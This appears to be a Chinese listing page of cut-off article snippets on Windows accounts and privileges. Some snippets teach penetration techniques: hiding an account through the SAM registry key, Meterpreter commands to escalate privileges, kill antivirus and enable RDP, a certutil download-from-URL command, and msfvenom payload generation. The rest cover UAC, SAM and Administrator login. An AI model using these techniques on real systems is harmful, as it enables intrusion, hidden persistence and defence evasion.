渗透技巧——Windows系统的帐户隐藏 2017-11-28-00:08:55  0x01 帐户隐藏的方法 该方法在网上已有相关资料,本节只做简单复现 测试系统:·Win7 x86/WinXP 1.对注册表赋予权限 默认注册表HKEY_LOCAL_MACHINE\SAM\SAM\只有system权限才能修改 现在需要为其添加管理员权限 右键-权限-选中Administrators,允许完全控制,如下图: 重新启动注册表regedit.exe,获得对该键值的修改权限. 2.新建特殊帐户 net …

后渗透攻击: 介绍常用的一些命令: 查看进程:ps 查看当前进程号:getpid 查看系统信息:sysinfo 查看目标机是否为虚拟机:run post/windows/gather/checkvm 查看完整网络设置:route 查看当前权限:getuid 自动提权:getsystem 关闭杀毒软件:run post/windows/manage/killav 启动远程桌面协议:run post/windows/manage/enable_rdp 列举当前登录的用户:run post/windo…

今天碰到一同事,在那里删除注册表,死活都删除不掉,想起以前在学校的时候老是被莫名的被别人叫过去修电脑(开玩笑,真觉得那时候的我比现在牛B很多),什么删除不掉的东西没见过,然后小小的百度了一下很快就帮他解决问题了,好吧,听说大脑是非常不靠谱的东西(RAM),哪天掉电了就忘记了,所以小小的记录一笔. 什么是System权限? 不废话,就是Windows操作系统下的最高权限账户,也就是你在任务管理器里面经常看到的很多进程或者服务所属的账户,类似于Linux下的Root权限. (什么?你认为Admini…

certutil简介 用于证书管理 支持环境: XP  -  Windows 10 全系统 更多:https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx downloader (1) 保存在当前路径,文件名称同URL eg: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/version.t…

攻击机:kaili ip:192.168.80.157 目标机:win7 IP:192.168.80.158 这里用两种方法去创建meterpreter会话: 1)利用kali中的msfvenom生成木马,在目标机上运行,具体步骤如下: 常用参数: -p 选择攻击的payload-l 载荷列表-f 生成的文件格式-e 编码方式-i 编码次数-b 在生成的程序中避免出现的值一般格式: msfvenom -p 指定攻击的payload LHOST=监听IP LPORT=监听端口 -f 输出的文件格式…

权限是Windows管理的基础,当然与Windows用户关系最密切,平时接触最多的是与帐户相关的权限.对于Windows帐户权限的管理,你是否完全了解呢?下面,笔者以Winsows XP为例进行相关测试,希望对提升认识有所帮助.  1.系统权限概述 大家知道,Windows NT系统是个等级森严的系统,操作系统通过对用户(帐户)授权来实施管理.以Windows XP系统为例,系统默认的用户等级有4级:其中System拥有至高无上的权限,掌握着系统资源的生死大权;Administrators组的用…

用户帐户控制 深入了解 Windows 7 用户帐户控制 Mark Russinovich   概览: 标准用户帐户 用户帐户控制 内容 UAC 技术 提升与恶意软件安全性 Windows 7 中的不同之处 自动提升 自动提升与 UAC 的目标 在家庭和公司环境中,使用标准用户帐户可以提高安全性并降低总体拥有成本.当用户使用标准用户权限(而不是管理权限)运行时,系统的安全配置(包括防病毒和防火墙配置)将得到保护.这样,用户将能拥有一个安全的区域,可以保护他们的帐户及系统的其余部分.对于企业部署,…

转自MSND:http://technet.microsoft.com/zh-cn/library/ff758656(v=office.14) 对象缓存存储 Microsoft SharePoint Server 2010 中项目的相关属性.发布功能在呈现网页时使用此缓存中的项目.对象缓存的目标是减少运行 SQL Server 的计算机上的负载,并缩短请求延迟和增加吞吐量.对象缓存以两个自带用户帐户之一的身份来进行查询:“门户超级用户”和“门户超级读者”.必须正确配置这两个用户帐户,确保对象缓存…

0x01 用户帐户 1.1 简介        用户帐户是对计算机用户身份的标识,本地用户帐户.密码存在本地计算机上,只对本机有效,存储在本地安全帐户数据库 SAM 中.        文件路径:C:\Windows\System32\config\SAM ,对应的进程:lsass.exe  .通过本地用户和组,可以为用户和组分配权利和权限,从而限制用户和组执行某些操作的能力. 不同的用户身份拥有不同的权限 每个用户包含一个名称和一个密码 用户帐户拥有唯一的安全标识符(Security Iden…

一.有新账户后administrator账户会自动隐藏的,如果你要用administrator账户登录的话,就机器启动到选账户那里用ctrl+alt+del软启动,然后就可以输入账户名administrator以及其密码登录了二.如何让administrator帐户出现在登陆画面?安装Windows XP时,如果设置了一个管理员账户,那么系统内置没有密码保护的Administrator管理员账户是不会出现在用户登录列表中的.虽然它身在幕后,可却拥有系统最高权限,为了方便操作及保证系统安全,可以先…